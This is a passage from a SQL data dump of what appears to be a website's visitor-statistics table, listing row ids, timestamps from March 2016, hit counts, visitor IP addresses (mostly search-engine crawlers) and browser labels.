57087933,17,17,0,0,'141.8.183.14','other'),(13243,1457087936,3,3,0,0,'130.193.37.21','other'),(13244,1457087937,1,1,0,0,'130.193.51.43','other'),(13245,1457087938,2,2,0,0,'93.158.152.26','other'),(13246,1457087939,2,2,0,0,'141.8.184.22','other'),(13247,1457087940,3,3,0,0,'130.193.51.102','other'),(13248,1457087941,2,2,0,0,'141.8.132.79','other'),(13249,1457087943,1,1,0,0,'130.193.51.85','other'),(13250,1457087944,8,8,0,0,'130.193.51.45','other'),(13251,1457087946,3,3,0,0,'5.255.253.10','other'),(13252,1457087947,2,2,0,0,'141.8.142.10','other'),(13253,1457087949,2,2,0,0,'5.255.253.55','other'),(13254,1457087950,1,1,0,0,'130.193.37.27','other'),(13255,1457087951,2,2,0,0,'141.8.142.8','other'),(13256,1457087955,4,4,0,0,'141.8.132.99','other'),(13258,1457087984,5,5,0,0,'5.255.253.100','other'),(13259,1457087991,2,0,2,0,'66.249.66.162',''),(13260,1457088026,1,1,0,0,'130.193.51.81','other'),(13261,1457088028,1,1,0,0,'141.8.142.60','other'),(13262,1457088029,1,1,0,0,'5.255.253.17','other'),(13263,1457088085,2,2,0,0,'93.158.152.65','other'),(13264,1457088093,1,1,0,0,'5.255.253.62','other'),(13266,1457088094,4,4,0,0,'178.154.189.12','other'),(13267,1457088097,2,2,0,0,'141.8.132.76','other'),(13269,1457088099,2,2,0,0,'130.193.51.22','other'),(13270,1457088102,1,1,0,0,'141.8.132.109','other'),(13271,1457088106,2,2,0,0,'141.8.142.55','other'),(13272,1457088107,1,1,0,0,'141.8.132.44','other'),(13273,1457088109,2,2,0,0,'141.8.132.48','other'),(13274,1457088116,2,2,0,0,'141.8.184.11','other'),(13275,1457088120,2,2,0,0,'141.8.132.74','other'),(13276,1457088122,1,1,0,0,'130.193.51.109','other'),(13277,1457088126,1,1,0,0,'5.255.253.30','other'),(13278,1457088129,1,1,0,0,'5.255.253.110','other'),(13279,1457088132,1,1,0,0,'141.8.142.41','other'),(13280,1457088559,2,0,2,0,'66.249.66.166',''),(13281,1457089081,12,10,2,0,'66.249.66.158',''),(13282,1457089106,1,1,0,0,'66.249.66.133','other'),(13283,1457089132,2,2,0,0,'66.249.66.190','other'),(13284,1457089306,1,1,0,0,'207.46.13.188','other'),(13285,1457089546,1,0,1,0,'66.249.66.166',''),(13286,1457089607,1,1,0,0,'37.9.122.203','other'),(13287,1457089611,2,2,0,0,'178.154.189.204','other'),(13288,1457089625,1,1,0,0,'141.8.184.22','other'),(13289,1457089639,1,1,0,0,'69.30.198.242','other'),(13290,1457090086,3,0,3,0,'66.249.66.158',''),(13291,1457090129,1,1,0,0,'8.29.198.25','other'),(13292,1457090486,1,0,1,0,'66.249.66.190',''),(13293,1457090489,1,1,0,0,'141.8.184.18','other'),(13294,1457090595,1,1,0,0,'207.46.13.188','other'),(13295,1457090946,1,1,0,0,'93.158.152.26','other'),(13296,1457091129,3,1,2,0,'66.249.66.158',''),(13297,1457091230,2,0,2,0,'66.249.66.166',''),(13298,1457091234,1,0,1,0,'68.180.229.232',''),(13299,1457091338,1,1,0,0,'128.75.117.208','msie'),(13300,1457091339,1,1,0,0,'90.154.98.157','msie'),(13302,1457091345,1,1,0,0,'188.244.47.157','msie'),(13303,1457091353,1,1,0,0,'95.25.244.40','msie'),(13304,1457091430,1,0,1,0,'66.249.66.162',''),(13305,1457091476,1,0,1,0,'66.249.66.133',''),(13306,1457091715,2,2,0,0,'5.255.253.30','other'),(13307,1457091723,1,1,0,0,'141.8.184.6','other'),(13308,1457091742,3,3,0,0,'130.193.37.21','other'),(13309,1457091749,1,1,0,0,'178.154.189.12','other'),(13310,1457091752,1,1,0,0,'130.193.51.91','other'),(13311,1457091759,2,2,0,0,'93.158.152.65','other'),(13312,1457091770,1,1,0,0,'178.154.189.6','other'),(13313,1457091792,3,3,0,0,'5.255.253.9','other'),(13314,1457091982,1,1,0,0,'66.249.66.162','other'),(13315,1457092167,1,1,0,0,'37.53.90.175','firefox'),(13316,1457092204,1,1,0,0,'207.46.13.90','other'),(13317,1457092234,1,1,0,0,'66.249.93.80','other'),(13318,1457092388,1,1,0,0,'37.53.76.152','chrome'),(13319,1457092402,1,1,0,0,'207.46.13.5','other'),(13320,1457092587,3,3,0,0,'178.154.149.11','other'),(13321,1457092588,3,3,0,0,'141.8.183.14','other'),(13322,1457092589,3,3,0,0,'93.158.152.9','other'),(13324,1457092591,3,3,0,0,'141.8.132.99','other'),(13325,1457092593,4,4,0,0,'5.255.253.100','other'),(13327,1457092594,3,3,0,0,'130.193.51.43','other'),(13328,1457092596,3,3,0,0,'5.255.253.10','other'),(13330,1457092597,2,2,0,0,'141.8.184.11','other'),(13331,1457092598,3,3,0,0,'141.8.142.10','other'),(13332,1457092599,3,3,0,0,'130.193.51.81','other'),(13333,1457092600,2,2,0,0,'141.8.184.22','other'),(13334,1457092601,1,1,0,0,'141.8.132.97','other'),(13336,1457092602,2,2,0,0,'5.255.253.110','other'),(13337,1457092603,2,2,0,0,'141.8.142.88','other'),(13338,1457092604,2,2,0,0,'5.255.253.55','other'),(13339,1457092605,2,2,0,0,'141.8.132.76','other'),(13340,1457092606,2,2,0,0,'141.8.132.79','other'),(13342,1457092607,3,3,0,0,'141.8.142.41','other'),(13343,1457092608,3,3,0,0,'130.193.51.85','other'),(13344,1457092609,2,2,0,0,'141.8.142.8','other'),(13345,1457092610,2,2,0,0,'141.8.184.18','other'),(13346,1457092616,2,2,0,0,'130.193.51.45','other'),(13347,1457092619,2,2,0,0,'141.8.132.2','other'),(13348,1457092620,2,2,0,0,'93.158.152.26','other'),(13349,1457092859,2,2,0,0,'130.193.37.27','other'),(13350,1457092867,1,1,0,0,'5.255.253.53','other'),(13352,1457092875,1,1,0,0,'5.255.253.9','other'),(13353,1457092878,1,1,0,0,'130.193.51.102','other'),(13354,1457092880,1,1,0,0,'5.255.253.30','other'),(13355,1457093305,210,210,0,0,'80.91.162.99','other'),(13356,1457093341,1,0,1,0,'66.249.66.162',''),(13357,1457093470,1,0,1,0,'66.249.66.166',''),(13358,1457094198,1,1,0,0,'66.249.66.162','other'),(13359,1457094236,5,0,5,0,'66.249.66.158',''),(13360,1457094337,1,1,0,0,'207.46.13.188','other'),(13361,1457094668,1,0,1,0,'66.249.66.166',''),(13362,1457094709,1,1,0,0,'141.8.183.14','other'),(13363,1457094713,2,2,0,0,'93.158.152.9','other'),(13364,1457094717,3,3,0,0,'5.255.253.53','other'),(13365,1457094721,2,2,0,0,'130.193.37.21','other'),(13366,1457094725,3,3,0,0,'141.8.132.99','other'),(13367,1457094730,1,1,0,0,'5.255.253.100','other'),(13368,1457094734,1,1,0,0,'130.193.51.45','other'),(13369,1457094738,1,1,0,0,'130.193.51.43','other'),(13370,1457094753,1,1,0,0,'130.193.51.102','other'),(13371,1457094758,1,1,0,0,'141.8.142.88','other'),(13372,1457094761,1,1,0,0,'5.255.253.55','other'),(13373,1457094765,1,1,0,0,'130.193.37.27','other'),(13374,1457094770,2,2,0,0,'141.8.184.18','other'),(13375,1457094787,1,1,0,0,'130.193.51.85','other'),(13376,1457094795,1,1,0,0,'178.154.149.11','other'),(13377,1457095138,2,1,1,0,'66.249.66.162',''),(13378,1457095156,1,1,0,0,'91.196.178.99','chrome'),(13379,1457095328,2,0,2,0,'68.180.229.232',''),(13380,1457095484,1,0,1,0,'66.249.66.158',''),(13381,1457095807,1,1,0,0,'66.249.93.86','other'),(13382,1457096290,2,2,0,0,'178.154.149.11','other'),(13383,1457096294,2,2,0,0,'130.193.37.21','other'),(13384,1457096298,1,1,0,0,'141.8.183.14','other'),(13385,1457096411,2,2,0,0,'141.8.132.76','other'),(13386,1457096415,1,1,0,0,'5.255.253.9','other'),(13387,1457097009,1,0,1,0,'66.249.66.162',''),(13388,1457097485,1,1,0,0,'207.46.13.170','other'),(13389,1457097840,1,0,1,0,'68.180.229.232',''),(13390,1457098046,2,0,2,0,'66.249.66.166',''),(13391,1457098164,1,0,1,0,'66.249.66.158',''),(13392,1457099020,1,1,0,0,'66.249.66.190','other'),(13393,1457099040,1,1,0,0,'66.249.92.99','other'),(13394,1457099069,1,1,0,0,'141.8.183.14','other'),(13395,1457099070,1,1,0,0,'93.158.152.9','other'),(13396,1457099072,1,1,0,0,'5.255.253.53','other'),(13397,1457099073,1,1,0,0,'141.8.132.99','other'),(13398,1457099105,1,0,1,0,'68.180.229.232',''),(13399,1457099348,1,0,1,0,'66.249.66.166',''),(13400,1457099431,1,1,0,0,'217.69.143.59','other'),(13401,1457100008,2,0,2,0,'68.180.229.232',''),(13402,1457100306,2,0,2,0,'66.249.66.162',''),(13403,1457100431,1,1,0,0,'5.255.253.55','other'),(13404,1457100435,1,1,0,0,'141.8.132.76','other'),(13405,1457100439,2,2,0,0,'141.8.132.79','other'),(13406,1457100443,2,2,0,0,'5.255.253.62','other'),(13407,1457100470,2,1,1,0,'66.249.66.166',''),(13408,1457100633,1,1,0,0,'141.8.142.88','other'),(13409,1457100637,1,1,0,0,'130.193.51.45','other'),(13410,1457100641,1,1,0,0,'141.8.132.44','other'),(13411,1457100645,2,2,0,0,'93.158.152.81','other'),(13412,1457100658,1,1,0,0,'5.255.253.103','other'),(13413,1457100661,1,1,0,0,'130.193.37.21','other'),(13414,1457100666,1,1,0,0,'178.154.189.6','other'),(13415,1457100674,1,1,0,0,'141.8.132.48','other'),(13416,1457100678,2,2,0,0,'141.8.142.8','other'),(13417,1457100691,1,1,0,0,'141.8.132.2','other'),(13418,1457100695,2,2,0,0,'130.193.50.22','other'),(13419,1457100703,1,1,0,0,'141.8.184.11','other'),(13420,1457100707,1,1,0,0,'130.193.37.27','other'),(13421,1457100715,1,1,0,0,'130.193.51.109','other'),(13422,1457100720,1,1,0,0,'5.255.253.100','other'),(13423,1457100724,1,1,0,0,'141.8.184.22','other'),(13424,1457100795,2,1,1,0,'66.249.66.158',''),(13425,1457100929,8,8,0,0,'207.46.13.188','other'),(13426,1457100956,6,6,0,0,'207.46.13.5','other'),(13427,1457100978,1,1,0,0,'8.29.198.25','other'),(13428,1457101002,1,0,1,0,'68.180.229.232',''),(13429,1457101184,2,2,0,0,'207.46.13.90','other'),(13430,1457101254,2,1,1,0,'66.249.66.162',''),(13431,1457101933,2,1,1,0,'66.249.66.158',''),(13432,1457102076,4,3,1,0,'66.249.66.162',''),(13433,1457102725,1,1,0,0,'66.249.66.166','other'),(13434,1457103019,1,1,0,0,'66.249.93.80','other'),(13435,1457103064,1,0,1,0,'66.249.66.162',''),(13436,1457103720,1,0,1,0,'66.249.66.158',''),(13437,1457103854,1,1,0,0,'141.8.184.22','other'),(13438,1457103974,1,0,1,0,'66.249.66.166',''),(13439,1457104030,1,1,0,0,'162.247.72.27','chrome'),(13440,1457104068,1,1,0,0,'104.156.228.171','chrome'),(13441,1457104236,1,0,1,0,'66.249.66.190',''),(13442,1457104372,1,1,0,0,'207.46.13.5','other'),(13443,1457104765,2,1,1,0,'66.249.66.158',''),(13444,1457104956,1,1,0,0,'130.193.50.22','other'),(13445,1457105066,1,0,1,0,'68.180.229.232',''),(13446,1457105756,1,0,1,0,'66.249.66.166',''),(13447,1457106159,1,1,0,0,'66.249.66.166','other'),(13448,1457106184,1,1,0,0,'207.46.13.5','other'),(13449,1457106279,1,0,1,0,'68.180.229.232',''),(13450,1457106616,1,1,0,0,'66.249.93.86','other'),(13451,1457107443,1,0,1,0,'66.249.66.129',''),(13452,1457107717,1,1,0,0,'66.249.93.80','firefox'),(13453,1457107958,1,1,0,0,'92.113.174.126','firefox'),(13454,1457108005,6,6,0,0,'207.46.13.170','other'),(13455,1457108151,1,1,0,0,'66.249.66.133','other'),(13456,1457108287,1,1,0,0,'62.210.215.100','chrome'),(13457,1457109112,1,0,1,0,'66.249.66.166',''),(13458,1457109447,1,1,0,0,'66.249.66.166','other'),(13459,1457110232,1,1,0,0,'66.249.93.80','other'),(13460,1457110392,1,1,0,0,'66.249.92.103','other'),(13461,1457110509,3,0,3,0,'66.249.66.162',''),(13462,1457110637,1,1,0,0,'91.196.178.168','firefox'),(13463,1457110738,103,103,0,0,'5.9.85.4','other'),(13464,1457110873,1,1,0,0,'93.158.152.65','other'),(13465,1457111235,2,0,2,0,'68.180.229.232',''),(13466,1457111319,2,2,0,0,'207.46.13.90','other'),(13467,1457111355,2,0,2,0,'66.249.66.158',''),(13468,1457111447,2,0,2,0,'66.249.66.162',''),(13469,1457111808,1,1,0,0,'8.29.198.26','other'),(13470,1457111939,1,1,0,0,'91.196.178.67','firefox'),(13471,1457112088,1,1,0,0,'91.196.178.40','chrome'),(13472,1457112312,1,1,0,0,'66.249.66.162','other'),(13473,1457112317,1,1,0,0,'37.9.122.201','other'),(13474,1457112321,1,1,0,0,'178.154.189.204','other'),(13475,1457112554,2,2,0,0,'66.249.66.158','other'),(13476,1457112871,1,1,0,0,'207.46.13.90','other'),(13477,1457113686,1,0,1,0,'66.249.66.166',''),(13478,1457113705,2,0,2,0,'66.249.66.158',''),(13479,1457113783,2,0,2,0,'66.249.66.190',''),(13480,1457113803,1,1,0,0,'66.249.93.80','other'),(13481,1457113927,1,1,0,0,'141.8.184.6','other'),(13482,1457113938,1,1,0,0,'130.193.51.55','other'),(13483,1457113947,2,2,0,0,'178.154.149.11','other'),(13484,1457113951,2,2,0,0,'5.255.253.53','other'),(13485,1457113956,2,2,0,0,'5.255.253.55','other'),(13486,1457113959,1,1,0,0,'141.8.142.55','other'),(13487,1457113963,3,3,0,0,'130.193.50.22','other'),(13488,1457113967,1,1,0,0,'5.255.253.17','other'),(13489,1457113972,2,2,0,0,'93.158.152.65','other'),(13490,1457113975,1,1,0,0,'141.8.184.18','other'),(13491,1457113983,1,1,0,0,'130.193.51.45','other'),(13492,1457113988,1,1,0,0,'130.193.37.27','other'),(13493,1457113992,1,1,0,0,'141.8.142.8','other'),(13494,1457113996,1,1,0,0,'141.8.184.31','other'),(13495,1457114000,2,2,0,0,'141.8.142.60','other'),(13496,1457114020,1,1,0,0,'130.193.51.43','other'),(13497,1457114024,1,1,0,0,'178.154.189.6','other'),(13498,1457114032,1,1,0,0,'141.8.184.11','other'),(13499,1457114171,1,1,0,0,'66.249.66.158','other'),(13500,1457114435,1,0,1,0,'66.249.66.162',''),(13501,1457114520,1,1,0,0,'89.67.240.30','firefox'),(13502,1457115137,2,1,1,0,'66.249.66.166',''),(13503,1457115160,5,0,5,0,'66.249.66.158',''),(13504,1457115482,1,1,0,0,'141.8.183.14','other'),(13505,1457115486,1,1,0,0,'5.255.253.53','other'),(13506,1457115600,1,0,1,0,'68.180.229.232',''),(13507,1457115658,1,1,0,0,'130.193.51.102','other'),(13508,1457115661,1,1,0,0,'5.255.253.55','other'),(13509,1457115891,1,0,1,0,'66.249.66.190',''),(13510,1457116030,2,1,1,0,'66.249.66.162',''),(13511,1457116630,1,1,0,0,'136.243.103.92','other'),(13512,1457116766,1,1,0,0,'91.196.177.69','chrome'),(13513,1457117084,2,0,2,0,'66.249.66.166',''),(13514,1457117471,1,1,0,0,'37.9.122.203','other'),(13515,1457117505,1,1,0,0,'217.69.143.57','other'),(13516,1457117589,5,0,5,0,'66.249.66.158',''),(13517,1457117814,1,1,0,0,'207.46.13.125','other'),(13518,1457117847,1,0,1,0,'66.249.66.162',''),(13519,1457118106,2,1,1,0,'66.249.66.162',''),(13520,1457118150,1,1,0,0,'94.179.51.77','firefox'),(13521,1457118258,2,2,0,0,'141.8.184.18','other'),(13522,1457118501,1,0,1,0,'66.249.66.166',''),(13523,1457118572,1,1,0,0,'66.249.66.158','other'),(13524,1457118653,1,1,0,0,'66.249.66.162','other'),(13525,1457118930,2,2,0,0,'66.249.66.166','other'),(13526,1457119120,1,1,0,0,'91.196.178.131','chrome'),(13527,1457119193,15,15,0,0,'141.8.184.18','other'),(13528,1457119237,10,10,0,0,'141.8.183.14','other'),(13529,1457119245,12,12,0,0,'178.154.149.11','other'),(13530,1457119259,1,1,0,0,'5.255.253.100','other'),(13531,1457119283,5,5,0,0,'5.255.253.53','other'),(13532,1457119286,12,12,0,0,'93.158.152.9','other'),(13533,1457119333,1,1,0,0,'130.193.37.21','other'),(13534,1457119417,2,2,0,0,'141.8.132.99','other'),(13535,1457119600,1,1,0,0,'66.249.66.162','other'),(13536,1457120298,2,2,0,0,'141.8.184.18','other'),(13537,1457120307,3,2,1,0,'66.249.66.158',''),(13538,1457120593,1,0,1,0,'66.249.66.166',''),(13539,1457120734,1,1,0,0,'66.249.66.133','other'),(13540,1457120959,1,1,0,0,'217.69.133.70','other'),(13542,1457121021,1,1,0,0,'66.249.93.80','other'),(13543,1457121098,3,2,1,0,'66.249.66.162',''),(13544,1457121341,1,1,0,0,'66.249.92.95','other'),(13545,1457121807,1,1,0,0,'217.69.133.84','other'),(13546,1457121823,1,1,0,0,'66.249.66.190','other'),(13547,1457121983,1,1,0,0,'66.249.66.166','other'),(13548,1457122026,1,1,0,0,'217.69.133.227','other'),(13549,1457122213,1,1,0,0,'217.69.133.216','other'),(13550,1457122291,1,1,0,0,'217.69.136.205','other'),(13551,1457122460,1,1,0,0,'141.8.142.55','other'),(13552,1457122504,2,2,0,0,'66.249.66.162','other'),(13553,1457122542,1,1,0,0,'217.69.133.230','other'),(13554,1457122670,1,1,0,0,'8.29.198.26','other'),(13555,1457122703,1,1,0,0,'62.210.215.100','chrome'),(13556,1457122780,1,0,1,0,'68.180.229.232',''),(13557,1457123070,1,0,1,0,'66.249.66.166',''),(13558,1457123447,1,1,0,0,'66.249.66.158','other'),(13559,1457123874,1,1,0,0,'95.133.238.54','firefox'),(13560,1457123941,1,1,0,0,'130.193.51.55','other'),(13561,1457124238,3,0,3,0,'66.249.66.166',''),(13562,1457124254,1,1,0,0,'176.213.12.63','firefox'),(13563,1457124489,1,1,0,0,'66.249.66.190','other'),(13564,1457124527,2,0,2,0,'66.249.66.158',''),(13565,1457124632,1,1,0,0,'66.249.93.86','other'),(13566,1457124780,1,1,0,0,'80.91.162.99','other'),(13567,1457124991,1,1,0,0,'178.154.189.204','other'),(13568,1457125077,1,0,1,0,'68.180.229.232',''),(13569,1457125273,1,0,1,0,'66.249.66.162',''),(13570,1457125963,2,2,0,0,'130.193.51.85','other'),(13571,1457126184,2,2,0,0,'141.8.184.31','other'),(13572,1457126185,1,1,0,0,'141.8.184.6','other'),(13573,1457126186,1,1,0,0,'178.154.189.12','other'),(13575,1457126188,1,1,0,0,'130.193.51.22','other'),(13577,1457126328,2,0,2,0,'66.249.66.166',''),(13578,1457126453,3,0,3,0,'66.249.66.158',''),(13579,1457126466,2,2,0,0,'141.8.184.22','other'),(13581,1457126467,2,2,0,0,'5.255.253.55','other'),(13582,1457126469,1,1,0,0,'5.255.253.94','other'),(13583,1457126473,1,1,0,0,'141.8.142.10','other'),(13584,1457126475,1,1,0,0,'141.8.142.41','other'),(13585,1457126476,1,1,0,0,'5.255.253.51','other'),(13586,1457126477,1,1,0,0,'130.193.50.22','other'),(13587,1457126612,3,0,3,0,'66.249.66.162',''),(13588,1457126627,1,0,1,0,'66.249.66.129',''),(13589,1457126718,1,1,0,0,'217.69.133.225','other'),(13590,1457126751,1,1,0,0,'217.69.133.216','other'),(13591,1457127205,1,1,0,0,'180.76.15.32','other'),(13592,1457127259,1,1,0,0,'217.69.133.223','other'),(13593,1457127644,1,1,0,0,'217.69.133.221','other'),(13594,1457128217,1,1,0,0,'66.249.93.80','other'),(13595,1457128236,1,1,0,0,'130.193.37.27','other'),(13596,1457128272,1,0,1,0,'66.249.66.166',''),(13597,1457128274,3,0,3,0,'66.249.66.158',''),(13598,1457128355,2,0,2,0,'66.249.66.162',''),(13599,1457128397,1,1,0,0,'141.8.184.11','other'),(13600,1457128844,1,0,1,0,'68.180.229.232',''),(13601,1457129279,1,0,1,0,'66.249.66.190',''),(13602,1457129594,2,0,2,0,'66.249.66.166',''),(13603,1457129652,3,0,3,0,'66.249.66.158',''),(13604,1457129815,1,1,0,0,'207.46.13.125','other'),(13605,1457129892,2,0,2,0,'66.249.66.162',''),(13606,1457130974,3,3,0,0,'136.243.172.46','chrome'),(13607,1457131230,1,0,1,0,'66.249.66.162',''),(13608,1457131630,1,1,0,0,'46.55.23.55','chrome'),(13609,1457131749,2,0,2,0,'66.249.66.158',''),(13610,1457131902,1,1,0,0,'66.249.93.80','other'),(13611,1457132136,2,0,2,0,'66.249.66.162',''),(13612,1457132203,1,1,0,0,'141.8.184.18','other'),(13613,1457132204,1,1,0,0,'5.255.253.53','other'),(13614,1457132501,1,1,0,0,'66.249.92.103','other'),(13615,1457132570,2,0,2,0,'66.249.66.166',''),(13616,1457132659,1,1,0,0,'217.69.133.85','other'),(13617,1457132660,1,1,0,0,'217.69.133.215','other'),(13618,1457132710,52,52,0,0,'207.46.13.90','other'),(13619,1457132740,62,62,0,0,'207.46.13.143','other'),(13620,1457132800,40,40,0,0,'157.55.39.52','other'),(13621,1457132861,51,51,0,0,'40.77.167.32','other'),(13622,1457132969,1,1,0,0,'217.69.136.204','other'),(13623,1457133123,1,1,0,0,'217.69.133.236','other'),(13624,1457133199,1,1,0,0,'217.69.133.69','other'),(13625,1457133218,2,2,0,0,'217.69.133.226','other'),(13627,1457133271,1,1,0,0,'217.69.133.216','other'),(13628,1457133357,1,1,0,0,'217.69.133.218','other'),(13629,1457133506,1,1,0,0,'8.29.198.26','other'),(13630,1457134127,1,1,0,0,'207.46.13.125','other'),(13631,1457134275,4,4,0,0,'141.8.184.18','other'),(13632,1457134277,3,3,0,0,'5.255.253.100','other'),(13633,1457134849,1,0,1,0,'68.180.229.232',''),(13634,1457135090,1,0,1,0,'66.249.66.162',''),(13635,1457135599,1,1,0,0,'141.8.184.18','other'),(13636,1457135774,1,1,0,0,'217.69.143.52','other'),(13637,1457135887,1,1,0,0,'157.55.39.241','other'),(13638,1457135981,3,3,0,0,'136.243.172.46','chrome'),(13639,1457136411,1,1,0,0,'46.55.23.55','chrome'),(13640,1457136563,2,0,2,0,'68.180.229.232',''),(13641,1457138163,1,1,0,0,'217.69.133.70','other'),(13642,1457138257,1,1,0,0,'178.154.189.204','other'),(13643,1457138418,1,0,1,0,'66.249.66.158',''),(13644,1457138471,2,2,0,0,'217.69.133.217','other'),(13645,1457138800,1,1,0,0,'217.69.133.218','other'),(13646,1457138817,2,2,0,0,'217.69.133.228','other'),(13647,1457138918,2,0,2,0,'68.180.229.232',''),(13648,1457139056,4,4,0,0,'141.8.184.18','other'),(13649,1457139060,1,1,0,0,'93.158.152.9','other'),(13650,1457139083,1,0,1,0,'66.249.66.162',''),(13651,1457139177,5,5,0,0,'178.154.189.204','other'),(13652,1457139244,1,1,0,0,'217.69.133.220','other'),(13653,1457139245,1,1,0,0,'217.69.133.221','other'),(13654,1457139779,1,0,1,0,'66.249.66.158',''),(13655,1457139936,1,0,1,0,'68.180.229.232',''),(13656,1457140156,1,1,0,0,'141.8.184.18','other'),(13657,1457140581,2,0,2,0,'66.249.66.162',''),(13658,1457140592,1,1,0,0,'66.249.66.158','other'),(13659,1457140772,1,1,0,0,'178.154.189.204','other'),(13660,1457141741,2,2,0,0,'178.154.189.204','other'),(13661,1457141745,1,1,0,0,'37.9.122.203','other'),(13662,1457141900,6,6,0,0,'136.243.172.46','chrome'),(13663,1457141927,1,0,1,0,'68.180.229.232',''),(13664,1457142378,1,1,0,0,'207.46.13.90','other'),(13665,1457143280,3,0,3,0,'66.249.66.162',''),(13666,1457143311,1,0,1,0,'66.249.66.129',''),(13667,1457143391,1,1,0,0,'66.249.92.103','other'),(13668,1457143580,1,1,0,0,'40.77.167.32','other'),(13669,1457143865,1,1,0,0,'141.8.132.79','other'),(13670,1457143866,1,1,0,0,'178.154.149.11','other'),(13671,1457144169,1,1,0,0,'66.249.66.166','other'),(13672,1457144195,4,1,3,0,'66.249.66.158',''),(13673,1457144430,235,235,0,0,'82.193.127.15','other'),(13674,1457144471,1,1,0,0,'8.29.198.26','other'),(13675,1457144707,2,2,0,0,'37.9.122.201','other'),(13676,1457144712,3,3,0,0,'178.154.189.204','other'),(13677,1457144720,2,2,0,0,'217.69.133.237','other'),(13679,1457144768,1,1,0,0,'217.69.133.70','other'),(13680,1457144783,1,1,0,0,'217.69.133.229','other'),(13681,1457144805,3,3,0,0,'136.243.172.46','chrome'),(13682,1457144962,1,1,0,0,'182.118.20.163','msie'),(13683,1457145012,1,1,0,0,'217.69.136.208','other'),(13684,1457145085,1,1,0,0,'217.69.133.235','other'),(13685,1457145256,1,1,0,0,'101.226.168.232','chrome'),(13686,1457145728,3,3,0,0,'178.154.189.204','other'),(13687,1457145732,1,1,0,0,'37.9.122.203','other'),(13688,1457145750,1,1,0,0,'141.8.132.97','other'),(13689,1457145754,1,1,0,0,'178.154.189.6','other'),(13690,1457145758,1,1,0,0,'130.193.51.50','other'),(13691,1457145762,1,1,0,0,'178.154.189.12','other'),(13692,1457145766,1,1,0,0,'130.193.51.45','other'),(13693,1457145770,1,1,0,0,'141.8.132.76','other'),(13694,1457145774,1,1,0,0,'5.255.253.10','other'),(13695,1457146195,1,1,0,0,'40.77.167.32','other'),(13696,1457146364,3,3,0,0,'136.243.172.46','chrome'),(13697,1457146525,1,0,1,0,'68.180.229.232',''),(13698,1457146652,1,0,1,0,'66.249.66.190',''),(13699,1457146664,1,0,1,0,'66.249.66.162',''),(13700,1457146728,2,1,1,0,'66.249.66.162',''),(13701,1457146762,1,1,0,0,'62.210.215.100','chrome'),(13702,1457147376,1,1,0,0,'130.193.37.21','other'),(13703,1457147980,1,1,0,0,'157.55.39.125','other'),(13704,1457148033,2,0,2,0,'66.249.66.162',''),(13705,1457148460,1,1,0,0,'66.249.66.129','other'),(13706,1457148526,2,0,2,0,'68.180.229.232',''),(13707,1457148735,1,0,1,0,'66.249.66.158',''),(13708,1457149000,1,0,1,0,'66.249.66.162',''),(13709,1457149105,1,1,0,0,'37.9.122.203','other'),(13710,1457149232,1,1,0,0,'157.55.39.125','other'),(13711,1457149305,1,1,0,0,'217.69.136.207','other'),(13712,1457149475,1,1,0,0,'130.193.37.21','other'),(13713,1457149477,1,1,0,0,'141.8.142.10','other'),(13714,1457149479,1,1,0,0,'130.193.37.27','other'),(13715,1457150086,1,1,0,0,'217.69.133.221','other'),(13716,1457150220,1,1,0,0,'66.249.66.129','other'),(13717,1457150250,2,2,0,0,'178.154.189.204','other'),(13718,1457150303,1,1,0,0,'101.226.167.202','chrome'),(13719,1457150304,2,1,1,0,'66.249.66.166',''),(13720,1457150637,4,4,0,0,'69.30.215.26','other'),(13721,1457150721,1,1,0,0,'217.69.133.222','other'),(13722,1457150722,1,1,0,0,'217.69.133.220','other'),(13723,1457150729,2,1,1,0,'66.249.66.162',''),(13724,1457150808,1,1,0,0,'37.9.122.203','other'),(13725,1457150812,1,1,0,0,'217.69.133.67','other'),(13726,1457150875,1,1,0,0,'217.69.133.215','other'),(13727,1457151703,4,4,0,0,'141.8.183.14','other'),(13728,1457151708,1,1,0,0,'130.193.37.21','other'),(13729,1457151709,2,1,1,0,'66.249.66.158',''),(13730,1457151711,1,1,0,0,'141.8.184.18','other'),(13731,1457151715,1,1,0,0,'178.154.149.11','other'),(13732,1457151731,1,1,0,0,'93.158.152.9','other'),(13733,1457151909,1,0,1,0,'66.249.66.162',''),(13734,1457152789,1,0,1,0,'66.249.66.166',''),(13735,1457152927,1,0,1,0,'66.249.66.158',''),(13736,1457152996,1,0,1,0,'66.249.66.162',''),(13737,1457153008,1,1,0,0,'91.196.178.165','other'),(13738,1457153173,1,1,0,0,'40.77.167.32','other'),(13739,1457153703,1,0,1,0,'66.249.66.166',''),(13740,1457153936,2,2,0,0,'66.249.66.158','other'),(13741,1457154031,1,1,0,0,'66.249.92.95','other'),(13742,1457154143,1,1,0,0,'141.8.184.18','other'),(13743,1457154322,1,0,1,0,'66.249.66.162',''),(13744,1457154826,1,1,0,0,'104.156.251.62','chrome'),(13745,1457155273,2,2,0,0,'178.154.189.204','other'),(13746,1457155312,1,1,0,0,'8.29.198.26','other'),(13747,1457155587,1,1,0,0,'66.102.9.84','firefox'),(13748,1457155729,1,1,0,0,'141.8.184.18','other'),(13749,1457155817,1,1,0,0,'217.69.133.233','other'),(13750,1457155970,1,1,0,0,'217.69.133.229','other'),(13751,1457156041,1,1,0,0,'217.69.133.231','other'),(13752,1457156195,1,1,0,0,'217.69.133.216','other'),(13753,1457156322,1,1,0,0,'217.69.143.59','other'),(13754,1457156335,1,1,0,0,'217.69.136.210','other'),(13755,1457156363,1,1,0,0,'217.69.133.240','other'),(13756,1457156628,1,1,0,0,'217.69.136.207','other'),(13758,1457156688,1,1,0,0,'217.69.133.236','other'),(13759,1457156729,1,1,0,0,'66.249.66.190','other'),(13760,1457156784,3,3,0,0,'136.243.172.46','chrome'),(13761,1457156857,1,0,1,0,'66.249.66.162',''),(13762,1457156958,8,8,0,0,'141.8.183.14','other'),(13763,1457156970,22,22,0,0,'178.154.149.11','other'),(13764,1457156973,6,6,0,0,'93.158.152.9','other'),(13765,1457156982,3,3,0,0,'5.255.253.53','other'),(13766,1457156985,41,41,0,0,'141.8.184.18','other'),(13767,1457157007,1,1,0,0,'157.55.39.125','other'),(13768,1457157217,1,1,0,0,'66.249.93.86','other'),(13769,1457157384,3,1,2,0,'66.249.66.158',''),(13770,1457157547,1,1,0,0,'82.145.216.81','other'),(13771,1457157605,1,1,0,0,'217.69.133.233','other'),(13772,1457157691,1,0,1,0,'66.249.66.129',''),(13773,1457157872,16,16,0,0,'141.8.183.14','other'),(13774,1457157874,8,8,0,0,'93.158.152.9','other'),(13775,1457157879,3,3,0,0,'130.193.37.21','other'),(13776,1457157881,27,27,0,0,'178.154.149.11','other'),(13777,1457157884,4,4,0,0,'5.255.253.53','other'),(13778,14